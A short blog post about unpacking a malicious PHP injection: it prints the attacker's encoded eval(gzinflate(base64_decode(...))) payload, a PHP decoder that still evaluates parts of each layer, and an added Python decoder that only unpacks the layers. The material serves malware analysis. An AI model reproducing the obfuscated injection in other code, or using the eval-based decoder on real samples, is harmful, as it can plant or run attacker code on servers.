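Decoding eval(gzinflate(base64_decode( in an injected malicious file

The server had malicious code injected into it, and the code turned out to be encrypted.

The following code decodes it: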

<?php
$a = "eval(gzinflate(base64_decode('bVFvS4NAHH4v+B1EZCos3dYKtiEtlrWgljkLIsbhvN92R3qK3moVfffuNMpgr+54eP7eqUoFHHGaAUppRrnVsyeqoioEYgylpc9yxoHxo+i9gLHGYc9dwrN0kpC4FEpvux4c9we6FOGYA8KwiXdp4/iRM0CCZJlBODMlxYguBFC+Qql5mk44L8auy/mLU2UnpyMnYeNRz9UnmmCSvOKIxRm0mLpjoKUfPvrhszmPogDN75aRuWqhwTwQ95tLcyXTfsqjbO1taApoK6YmDVZZf10c3aUMw94pSHEmcz0R9Jvv6J1dmXrt7PsHP3xCyyi8XlyJeL2D8yym7B+nOdHi/NY3V82bQkJyrVWqBg1h3hcbD27Q5EvI6rKIZE2BYQv2RZpjsEzX7NZy266Zmx1LOM2ZJr/0raQc4nUKVm1QT7FV5VNVpgnJctyCu73hcNhU/BI2B9R1vGQkcUIAyRIGpqVEvgE=')));";
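// Peel nested eval(gzinflate(base64_decode(...))) layers and return the innermost code.
function decodephp($a)
{
    $max_level = 300; // maximum number of layers
    for ($i = 0; $i < $max_level; $i++) {
        // Turn eval(...) into echo(...) so the layer is printed instead of run,
        // and capture the printed text as the next layer.
        // eval() still executes any other statements present in the layer.
        ob_start();
        eval(str_replace('eval', 'echo', $a));
        $a = ob_get_clean();
        if (strpos($a, 'eval(gzinflate(base64_decode') === false) {
            return $a;
        }
    }
    return $a; // layer limit reached; return what has been decoded so far
}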
echo decodephp($a);
?>
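
An added example, not from the original post: a static unwrapper in Python that peels the same layers with base64 and raw-DEFLATE decoding only, so no part of the sample is ever evaluated. The function names, the size cap and the sample payload are assumptions constructed for illustration; it goes slightly beyond the post's case by accepting either quote style and whitespace between the tokens.

```python
import base64
import re
import zlib

# One layer: eval(gzinflate(base64_decode('<base64>')));  with ' or " quotes
LAYER_RE = re.compile(
    r"""eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"""
    r"""(['"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*\)\s*;?"""
)


def unwrap(source, max_level=300, max_bytes=10 * 1024 * 1024):
    """Peel layers without executing anything.

    Returns (decoded_text, layers_removed). Like the PHP loop above, each
    decoded layer replaces the whole input, and max_level bounds the loop.
    """
    layers = 0
    while layers < max_level:
        match = LAYER_RE.search(source)
        if match is None:
            break
        raw = base64.b64decode(match.group(2))
        # PHP's gzinflate() reads raw DEFLATE (no zlib header): wbits = -15.
        inflater = zlib.decompressobj(-15)
        data = inflater.decompress(raw, max_bytes)
        if not inflater.eof:
            # Stream did not finish within max_bytes (or is truncated).
            raise ValueError("layer is incomplete or larger than max_bytes")
        source = data.decode("utf-8", errors="replace")
        layers += 1
    return source, layers


def wrap(php, depth):
    """Build a constructed test sample by nesting `depth` layers around `php`."""
    for _ in range(depth):
        deflater = zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15)
        packed = deflater.compress(php.encode()) + deflater.flush()
        php = "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(packed).decode()
    return php


if __name__ == "__main__":
    sample = wrap("echo 'constructed sample payload';", 3)  # constructed, harmless
    text, layers = unwrap(sample)
    print(layers, text)
```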

 

The purpose of the injection was to promote gray-market businesses. I have nothing but contempt for these people.